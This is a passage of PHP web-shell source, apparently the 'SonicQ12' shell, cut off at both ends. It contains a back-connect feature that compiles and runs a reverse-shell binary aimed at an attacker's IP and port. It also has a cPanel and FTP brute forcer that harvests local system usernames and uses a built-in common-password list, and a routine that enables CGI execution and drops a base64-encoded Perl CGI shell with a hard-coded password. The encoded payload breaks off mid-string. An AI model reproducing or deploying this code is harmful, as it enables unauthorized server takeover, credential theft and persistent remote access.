                cf('/tmp/angel_bc.c',$back_connect_c);

                $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');

                @unlink('/tmp/angel_bc.c');

                $res = execute("/tmp/angel_bc $yourip $yourport &");

            }

            m("Now script try connect to $yourip port $yourport ...");

        }



        formhead(array('title'=>'Back Connect'));

        makehide('action','backconnect');

        p('<p>');

        p('Your IP:');

        makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip));

        p('Your Port:');

        makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport));

        p('Use:');

        makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use));

        makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt'));

        p('</p>');

        formfoot();

    }





    elseif ($action == 'brute') {

        formhead(array('title'=>'Brute Forcer'));

        makehide('action','brute');

        makehide('dir',$brute);

        @ini_set('memory_limit', 1000000000000);

        $connect_timeout=5;

        @set_time_limit(0);

        $submit = $_REQUEST['submit'];

        $users = $_REQUEST['users'];

        $pass = $_REQUEST['passwords'];

        $target = $_REQUEST['target'];

        $option = $_REQUEST['option'];





        $passlist = "123pass

123!@#

123admin

123abc

123456admin

1234554321

12344321

pass123

admin

admincp

administrator

matkhau

passadmin

p@ssword

password

012345

123456

1234567

12345678

123456789

1234567890

111111

000000

222222

333333

444444

555555

666666

777777

888888

999999

123123

234234

345345

456456

567567

678678

789789

123321

456654

654321

7654321

87654321

987654321

0987654321

admin123

admin123456

abcdef

abcabc

!@#!@#

!@#$%^

!@#$%^&*(

!@#$$#@!

abc123

anhyeuem

iloveyou

admin

administrator

admincp

cpanel

adminx

admins

password

passwords

passw0rd

p@ssw0rd

p@ssword

khongco

25251325

passw0rds";

        if($target == ''){

            $target = 'localhost';

        }

        print " <div align='center'>

<form method='post' style='border: 1px solid #000000'><br><br>

<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#966117 border=1><tr><td>

<b> Target  : </font><input type='text' name='target' size='16' value= $target style='border: font-family:tahoma; font-weight:bold;'></p></font></b></p>

<div align='center'><br>

<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#966117 border=1>

<tr>

<td align='center'>

<b>Username</b></td>

<td>

<p align='center'>

<b>Password</b></td>

</tr>

</table>

<p align='center'>

<textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>";

        $i = 0;

        while ($i < 60000) {



            $line = posix_getpwuid($i);

            if (!empty($line)) {



                while (list ($key, $vba_etcpwd) = each($line)){

                    echo "".$vba_etcpwd."\n";

                    break;

                }



            }



            $i++;

        }

        echo "

</textarea>

<textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$passlist</textarea><br>

<br>

<b>Options : </span><input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel

<input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp ==> <input type='submit' value='Attack' name='submit' ></p>

</td></tr></table></td></tr></form><p align= 'left'>";

        ?>

        <?php

        function ftp_check($host,$user,$pass,$timeout){

            $ch = curl_init();

            curl_setopt($ch, CURLOPT_URL, "ftp://$host");

            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

            curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);

            curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);

            curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");

            curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);

            curl_setopt($ch, CURLOPT_FAILONERROR, 1);

            $data = curl_exec($ch);

            if ( curl_errno($ch) == 28 ) {



                print "<b> Error : Connection timed out , make confidence about validation of target !</b>";

                exit;}



            elseif ( curl_errno($ch) == 0 ){



                p("<b>[ SonicQ12 ]# </b>

<b> Attacking has been done! Username: <font color='#FF0000'> $user </font> / Password:<font color='#FF0000'> $pass </font> => <a href=http://$user:$pass@$host:2082 target=_blank>Login</a></b><br>");

            }

            curl_close($ch);}



        function cpanel_check($host,$user,$pass,$timeout){

            $ch = curl_init();

            curl_setopt($ch, CURLOPT_URL, "http://$host:2082");

            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

            curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);

            curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");

            curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);

            curl_setopt($ch, CURLOPT_FAILONERROR, 1);

            $data = curl_exec($ch);

            if ( curl_errno($ch) == 28 ) {

                print "<b> Error : Connection timed out , make confidence about validation of target !</b>";

                exit;}

            elseif ( curl_errno($ch) == 0 ){



                p("<b>[ SonicQ12 ]# </b><b>Attacking has been done!</a> Username: <font color='#FF0000'> $user </font> / Password:<font color='#FF0000'> $pass </font></b><br>");}curl_close($ch);}



        if(isset($submit) && !empty($submit)){



            $userlist = explode ("\n" , $users );

            $passlist = explode ("\n" , $pass );

            p('<b>[ SonicQ12 ]# Attacking ...</font></b><br>');

            foreach ($userlist as $user) {

                $_user = trim($user);

                foreach ($passlist as $password ) {

                    $_pass = trim($password);

                    if($option == "ftp"){

                        ftp_check($target,$_user,$_pass,$connect_timeout);

                    }

                    if ($option == "cpanel")

                    {

                        cpanel_check($target,$_user,$_pass,$connect_timeout);

                    }

                }

            }

        }



        formfoot();

    }







	//Cgi Create
	elseif ($action == 'cgi')
	{
	mkdir('sonic', 0755);
	chdir('sonic');
		$hta_file = '.htaccess';
		$create_hta = fopen($hta_file, 'w');
		$hta_code = 'Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .sonicq12

AddHandler cgi-script .sonicq12
AddHandler cgi-script .sonicq12';
	fwrite($create_hta, $hta_code);
	fclose($create_hta);
	$cgi_code = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWFpbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgPGIgc3R5bGU9ImNvbG9yOmJsYWNrO2JhY2tncm91bmQtY29sb3I6I2ZmZmY2NiI+Q0dJIHNoZWxsPC9iPiAjIHNlcnZlcgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgQ29uZmlndXJhdGlvbjogWW91IG5lZWQgdG8gY2hhbmdlIG9ubHkgJFBhc3N3b3JkIGFuZCAkV2luTlQuIFRoZSBvdGhlcgojIHZhbHVlcyBzaG91bGQgd29yayBmaW5lIGZvciBtb3N0IHN5c3RlbXMuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KJFBhc3N3b3JkID0gInNvbmljIjsJCSMgQ2hhbmdlIHRoaXMuIFlvdSB3aWxsIG5lZWQgdG8gZW50ZXIgdGhpcwoJCQkJIyB0byBsb2dpbi4KCiRXaW5OVCA9IDA7CQkJIyBZb3UgbmVlZCB0byBjaGFuZ2UgdGhlIHZhbHVlIG9mIHRoaXMgdG8gMSBpZgoJCQkJIyB5b3UncmUgcnVubmluZyB0aGlzIHNjcmlwdCBvbiBhIFdpbmRvd3MgTlQKCQkJCSMgbWFjaGluZS4gSWYgeW91J3JlIHJ1bm5pbmcgaXQgb24gVW5peCwgeW91CgkJCQkjIGNhbiBsZWF2ZSB0aGUgdmFsdWUgYXMgaXQgaXMuCgokTlRDbWRTZXAgPSAiJiI7CQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcwoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBXaW5kb3dzIE5ULgoKJFVuaXhDbWRTZXAgPSAiOyI7CQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcwoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBVbml4LgoKJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gPSAxMDsJIyBUaW1lIGluIHNlY29uZHMgYWZ0ZXIgY29tbWFuZHMgd2lsbCBiZSBraWxsZWQKCQkJCSMgRG9uJ3Qgc2V0IHRoaXMgdG8gYSB2ZXJ5IGxhcmdlIHZhbHVlLiBUaGlzIGlzCgkJCQkjIHVzZWZ1bCBmb3IgY29tbWFuZHMgdGhhdCBtYXkgaGFuZyBvciB0aGF0CgkJCQkjIHRha2UgdmVyeSBsb25nIHRvIGV4ZWN1dGUsIGxpa2UgImZpbmQgLyIuCgkJCQkjIFRoaXMgaXMgdmFsaWQgb25seSBvbiBVbml4IHNlcnZlcnMuIEl0IGlzCgkJCQkjIGlnbm9yZWQgb24gTlQgU2VydmVycy4KCiRTaG93RHluYW1pY091dHB1dCA9IDE7CQkjIElmIHRoaXMgaXMgMSwgdGhlbiBkYXRhIGlzIHNlbnQgdG8gdGhlCgkJCQkjIGJyb3dzZXIgYXMgc29vbiBhcyBpdCBpcyBvdXRwdXQsIG90aGVyd2lzZQoJCQkJIyBpdCBpcyBidWZmZXJlZCBhbmQgc2VuZCB3aGVuIHRoZSBjb21tYW5kCgkJCQkjIGNvbXBsZXRlcy4gVGhpcyBpcyB1c2VmdWwgZm9yIGNvbW1hbmRzIGxpa2UKCQkJCSMgcGluZywgc28gdGhhdCB5b3UgY2FuIHNlZSB0aGUgb3V0cHV0IGFzIGl0CgkJCQkjIGlzIGJlaW5nIGdlbmVyYXRlZC4KCiMgRE9OJ1QgQ0hBTkdFIEFOWVRISU5HIEJFTE9XIFRISVMgTElORSBVTkxFU1MgWU9VIEtOT1cgV0hBVCBZT1UnUkUgRE9JTkcgISEKCiRDbWRTZXAgPSAoJFdpbk5UID8gJE5UQ21kU2VwIDogJFVuaXhDbWRTZXApOwokQ21kUHdkID0gKCRXaW5OVCA/ICJjZCIgOiAicHdkIik7CiRQYXRoU2VwID0gKCRXaW5OVCA/ICJcXCIgOiAiLyIpOwokUmVkaXJlY3RvciA9ICgkV2luTlQgPyAiIDI+JjEgMT4mMiIgOiAiIDE+JjEgMj4mMSIpOwoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFJlYWRzIHRoZSBpbnB1dCBzZW50IGJ5IHRoZSBicm93c2VyIGFuZCBwYXJzZXMgdGhlIGlucHV0IHZhcmlhYmxlcy4gSXQKIyBwYXJzZXMgR0VULCBQT1NUIGFuZCBtdWx0aXBhcnQvZm9ybS1kYXRhIHRoYXQgaXMgdXNlZCBmb3IgdXBsb2FkaW5nIGZpbGVzLgojIFRoZSBmaWxlbmFtZSBpcyBzdG9yZWQgaW4gJGlueydmJ30gYW5kIHRoZSBkYXRhIGlzIHN0b3JlZCBpbiAkaW57J2ZpbGVkYXRhJ30uCiMgT3RoZXIgdmFyaWFibGVzIGNhbiBiZSBhY2Nlc3NlZCB1c2luZyAkaW57J3Zhcid9LCB3aGVyZSB2YXIgaXMgdGhlIG5hbWUgb2YKIyB0aGUgdmFyaWFibGUuIE5vdGU6IE1vc3Qgb2YgdGhlIGNvZGUgaW4gdGhpcyBmdW5jdGlvbiBpcyB0YWtlbiBmcm9tIG90aGVyIENHSQojIHNjcmlwdHMuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFJlYWRQYXJzZSAKewoJbG9jYWwgKCppbikgPSBAXyBpZiBAXzsKCWxvY2FsICgkaSwgJGxvYywgJGtleSwgJHZhbCk7CgkKCSRNdWx0aXBhcnRGb3JtRGF0YSA9ICRFTlZ7J0NPTlRFTlRfVFlQRSd9ID1+IC9tdWx0aXBhcnRcL2Zvcm0tZGF0YTsgYm91bmRhcnk9KC4rKSQvOwoKCWlmKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgIkdFVCIpCgl7CgkJJGluID0gJEVOVnsnUVVFUllfU1RSSU5HJ307Cgl9CgllbHNpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJQT1NUIikKCXsKCQliaW5tb2RlKFNURElOKSBpZiAkTXVsdGlwYXJ0Rm9ybURhdGEgJiAkV2luTlQ7CgkJcmVhZChTVERJTiwgJGluLCAkRU5WeydDT05URU5UX0xFTkdUSCd9KTsKCX0KCgkjIGhhbmRsZSBmaWxlIHVwbG9hZCBkYXRhCglpZigkRU5WeydDT05URU5UX1RZUEUnfSA9fiAvbXVsdGlwYXJ0XC9mb3JtLWRhdGE7IGJvdW5kYXJ5PSguKykkLykKCXsKCQkkQm91bmRhcnkgPSAnLS0nLiQxOyAjIHBsZWFzZSByZWZlciB0byBSRkMxODY3IAoJCUBsaXN0ID0gc3BsaXQoLyRCb3VuZGFyeS8sICRpbik7IAoJCSRIZWFkZXJCb2R5ID0gJGxpc3RbMV07CgkJJEhlYWRlckJvZHkgPX4gL1xyXG5cclxufFxuXG4vOwoJCSRIZWFkZXIgPSAkYDsKCQkkQm9keSA9ICQnOwogCQkkQm9keSA9fiBzL1xyXG4kLy87ICMgdGhlIGxhc3QgXHJcbiB3YXMgcHV0IGluIGJ5IE5ldHNjYXBlCgkJJGlueydmaWxlZGF0YSd9ID0gJEJvZHk7CgkJJEhlYWRlciA9fiAvZmlsZW5hbWU9XCIoLispXCIvOyAKCQkkaW57J2YnfSA9ICQxOyAKCQkkaW57J2YnfSA9fiBzL1wiLy9nOwoJCSRpbnsnZid9ID1+IHMvXHMvL2c7CgoJCSMgcGFyc2UgdHJhaWxlcgoJCWZvcigkaT0yOyAkbGlzdFskaV07ICRpKyspCgkJeyAKCQkJJGxpc3RbJGldID1+IHMvXi4rbmFtZT0kLy87CgkJCSRsaXN0WyRpXSA9fiAvXCIoXHcrKVwiLzsKCQkJJGtleSA9ICQxOwoJCQkkdmFsID0gJCc7CgkJCSR2YWwgPX4gcy8oXihcclxuXHJcbnxcblxuKSl8KFxyXG4kfFxuJCkvL2c7CgkJCSR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7CgkJCSRpbnska2V5fSA9ICR2YWw7IAoJCX0KCX0KCWVsc2UgIyBzdGFuZGFyZCBwb3N0IGRhdGEgKHVybCBlbmNvZGVkLCBub3QgbXVsdGlwYXJ0KQoJewoJCUBpbiA9IHNwbGl0KC8mLywgJGluKTsKCQlmb3JlYWNoICRpICgwIC4uICQjaW4pCgkJewoJCQkkaW5bJGldID1+IHMvXCsvIC9nOwoJCQkoJGtleSwgJHZhbCkgPSBzcGxpdCgvPS8sICRpblskaV0sIDIpOwoJCQkka2V5ID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOwoJCQkkdmFsID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOwoJCQkkaW57JGtleX0gLj0gIlwwIiBpZiAoZGVmaW5lZCgkaW57JGtleX0pKTsKCQkJJGlueyRrZXl9IC49ICR2YWw7CgkJfQoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBIVE1MIFBhZ2UgSGVhZGVyCiMgQXJndW1lbnQgMTogRm9ybSBpdGVtIG5hbWUgdG8gd2hpY2ggZm9jdXMgc2hvdWxkIGJlIHNldAojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludFBhZ2VIZWFkZXIKewoJJEVuY29kZWRDdXJyZW50RGlyID0gJEN1cnJlbnREaXI7CgkkRW5jb2RlZEN1cnJlbnREaXIgPX4gcy8oW15hLXpBLVowLTldKS8nJScudW5wYWNrKCJIKiIsJDEpL2VnOwoJcHJpbnQgIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7CglwcmludCA8PEVORDsKPGh0bWw+CjxoZWFkPgo8dGl0bGU+cHJpdjggY2dpIHNoZWxsPC90aXRsZT4KJEh0bWxNZXRhSGVhZGVyCgo8bWV0YSBuYW1lPSJrZXl3b3JkcyIgY29udGVudD0icHJpdjggY2dpIHNoZWxsICBfICAgICBpNV9AaG90bWFpbC5jb20iPgo8bWV0YSBuYW1lPSJkZXNjcmlwdGlvbiIgY29udGVudD0icHJpdjggY2dpIHNoZWxsICBfICAgIGk1X0Bob3RtYWlsLmNvbSI+CjwvaGVhZD4KPGJvZHkgb25Mb2FkPSJkb2N1bWVudC5mLkBfLmZvY3VzKCkiIGJnY29sb3I9IiNGRkZGRkYiIHRvcG1hcmdpbj0iMCIgbGVmdG1hcmdpbj0iMCIgbWFyZ2lud2lkdGg9IjAiIG1hcmdpbmhlaWdodD0iMCIgdGV4dD0iI0ZGMDAwMCI+Cjx0YWJsZSBib3JkZXI9IjEiIHdpZHRoPSIxMDAlIiBjZWxsc3BhY2luZz0iMCIgY2VsbHBhZGRpbmc9IjIiPgo8dHI+Cjx0ZCBiZ2NvbG9yPSIjRkZGRkZGIiBib3JkZXJjb2xvcj0iI0ZGRkZGRiIgYWxpZ249ImNlbnRlciIgd2lkdGg9IjElIj4KPGI+PGZvbnQgc2l6ZT0iMiI+IzwvZm9udD48L2I+PC90ZD4KPHRkIGJnY29sb3I9IiNGRkZGRkYiIHdpZHRoPSI5OCUiPjxmb250IGZhY2U9IlZlcmRhbmEiIHNpemU9IjIiPjxiPiAKPGIgc3R5bGU9ImNvbG9yOmJsYWNrO2JhY2tncm91bmQtY29sb3I6I2ZmZmY2NiI+cHJpdjggY2dpIHNoZWxsPC9iPiBDb25uZWN0ZWQgdG8gJFNlcnZlck5hbWU8L2I+PC9mb250PjwvdGQ+CjwvdHI+Cjx0cj4KPHRkIGNvbHNwYW49IjIiIGJnY29sb3I9IiNGRkZGRkYiPjxmb250IGZhY2U9IlZlcmRhbmEiIHNpemU9IjIiPgoKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9dXBsb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+VXBsb2FkIEZpbGU8L2ZvbnQ+PC9hPiB8IAo8YSBocmVmPSIkU2NyaXB0TG9jYXRpb24/YT1kb3dubG9hZCZkPSRFbmNvZGVkQ3VycmVudERpciI+PGZvbnQgY29sb3I9IiNGRjAwMDAiPkRvd25sb2FkIEZpbGU8L2ZvbnQ+PC9hPiB8CjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWxvZ291dCI+PGZvbnQgY29sb3I9IiNGRjAwMDAiPkRpc2Nvbm5lY3Q8L2ZvbnQ+PC9hPiB8CjwvZm9udD48L3RkPgo8L3RyPgo8L3RhYmxlPgo8Zm9udCBzaXplPSIzIj4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIExvZ2luIFNjcmVlbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ2luU2NyZWVuCnsKCSRNZXNzYWdlID0gcSQ8L2ZvbnQ+PGgxPnBhc3M9cHJpdjg8L2gxPjxmb250IGNvbG9yPSIjMDA5OTAwIiBzaXplPSIzIj48cHJlPjxpbWcgYm9yZGVyPSIwIiBzcmM9Imh0dHA6Ly93d3cucHJpdjguaWJsb2dnZXIub3JnL3MucGhwPytjZ2l0ZWxuZXQgc2hlbGwiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiPjwvcHJlPgokOwojJwoJcHJpbnQgPDxFTkQ7Cjxjb2RlPgoKVHJ5aW5nICRTZXJ2ZXJOYW1lLi4uPGJyPgpDb25uZWN0ZWQgdG8gJFNlcnZlck5hbWU8YnI+CkVzY2FwZSBjaGFyYWN0ZXIgaXMgXl0KPGNvZGU+JE1lc3NhZ2UKRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIG1lc3NhZ2UgdGhhdCBpbmZvcm1zIHRoZSB1c2VyIG9mIGEgZmFpbGVkIGxvZ2luCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50TG9naW5GYWlsZWRNZXNzYWdlCnsKCXByaW50IDw8RU5EOwo8Y29kZT4KPGJyPmxvZ2luOiBhZG1pbjxicj4KcGFzc3dvcmQ6PGJyPgpMb2dpbiBpbmNvcnJlY3Q8YnI+PGJyPgo8L2NvZGU+CkVORAp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gZm9yIGxvZ2dpbmcgaW4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUHJpbnRMb2dpbkZvcm0KewoJcHJpbnQgPDxFTkQ7Cjxjb2RlPgoKPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJsb2dpbiI+CjwvZm9udD4KPGZvbnQgc2l6ZT0iMyI+CmxvZ2luOiA8YiBzdHlsZT0iY29sb3I6YmxhY2s7YmFja2dyb3VuZC1jb2xvcjojZmZmZjY2Ij5wcml2OCBjZ2kgc2hlbGw8L2I+PGJyPgpwYXNzd29yZDo8L2ZvbnQ+PGZvbnQgY29sb3I9IiMwMDk5MDAiIHNpemU9IjMiPjxpbnB1dCB0eXBlPSJwYXNzd29yZCIgbmFtZT0icCI+CjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJFbnRlciI+CjwvZm9ybT4KPC9jb2RlPgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgZm9vdGVyIGZvciB0aGUgSFRNTCBQYWdlCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50UGFnZUZvb3Rlcgp7CglwcmludCAiPC9mb250PjwvYm9keT48L2h0bWw+IjsKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFJldHJlaXZlcyB0aGUgdmFsdWVzIG9mIGFsbCBjb29raWVzLiBUaGUgY29va2llcyBjYW4gYmUgYWNjZXNzZXMgdXNpbmcgdGhlCiMgdmFyaWFibGUgJENvb2tpZXN7Jyd9CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIEdldENvb2tpZXMKewoJQGh0dHBjb29raWVzID0gc3BsaXQoLzsgLywkRU5WeydIVFRQX0NPT0tJRSd9KTsKCWZvcmVhY2ggJGNvb2tpZShAaHR0cGNvb2tpZXMpCgl7CgkJKCRpZCwgJHZhbCkgPSBzcGxpdCgvPS8sICRjb29raWUpOwoJCSRDb29raWVzeyRpZH0gPSAkdmFsOwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBzY3JlZW4gd2hlbiB0aGUgdXNlciBsb2dzIG91dAojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ291dFNjcmVlbgp7CglwcmludCAiPGNvZGU+Q29ubmVjdGlvbiBjbG9zZWQgYnkgZm9yZWlnbiBob3N0Ljxicj48YnI+PC9jb2RlPiI7Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBMb2dzIG91dCB0aGUgdXNlciBhbmQgYWxsb3dzIHRoZSB1c2VyIHRvIGxvZ2luIGFnYWluCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFBlcmZvcm1Mb2dvdXQKewoJcHJpbnQgIlNldC1Db29raWU6IFNBVkVEUFdEPTtcbiI7ICMgcmVtb3ZlIHBhc3N3b3JkIGNvb2tpZQoJJlByaW50UGFnZUhlYWRlcigicCIpOwoJJlByaW50TG9nb3V0U2NyZWVuOwoKCSZQcmludExvZ2luU2NyZWVuOwoJJlByaW50TG9naW5Gb3JtOwoJJlByaW50UGFnZUZvb3RlcjsKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHRvIGxvZ2luIHRoZSB1c2VyLiBJZiB0aGUgcGFzc3dvcmQgbWF0Y2hlcywgaXQKIyBkaXNwbGF5cyBhIHBhZ2UgdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gcnVuIGNvbW1hbmRzLiBJZiB0aGUgcGFzc3dvcmQgZG9lbnMndAojIG1hdGNoIG9yIGlmIG5vIHBhc3N3b3JkIGlzIGVudGVyZWQsIGl0IGRpc3BsYXlzIGEgZm9ybSB0aGF0IGFsbG93cyB0aGUgdXNlcgojIHRvIGxvZ2luCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFBlcmZvcm1Mb2dpbiAKewoJaWYoJExvZ2luUGFzc3dvcmQgZXEgJFBhc3N3b3JkKSAjIHBhc3N3b3JkIG1hdGNoZWQKCXsKCQlwcmludCAiU2V0LUNvb2tpZTogU0FWRURQV0Q9JExvZ2luUGFzc3dvcmQ7XG4iOwoJCSZQcmludFBhZ2VIZWFkZXIoImMiKTsKCQkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsKCQkmUHJpbnRQYWdlRm9vdGVyOwoJfQoJZWxzZSAjIHBhc3N3b3JkIGRpZG4ndCBtYXRjaAoJewoJCSZQcmludFBhZ2VIZWFkZXIoInAiKTsKCQkmUHJpbnRMb2dpblNjcmVlbjsKCQlpZigkTG9naW5QYXNzd29yZCBuZSAiIikgIyBzb21lIHBhc3N3b3JkIHdhcyBlbnRlcmVkCgkJewoJCQkmUHJpbnRMb2dpbkZhaWxlZE1lc3NhZ2U7CgoJCX0KCQkmUHJpbnRMb2dpbkZvcm07CgkJJlByaW50UGFnZUZvb3RlcjsKCX0KfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIGVudGVyIGNvbW1hbmRzCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tL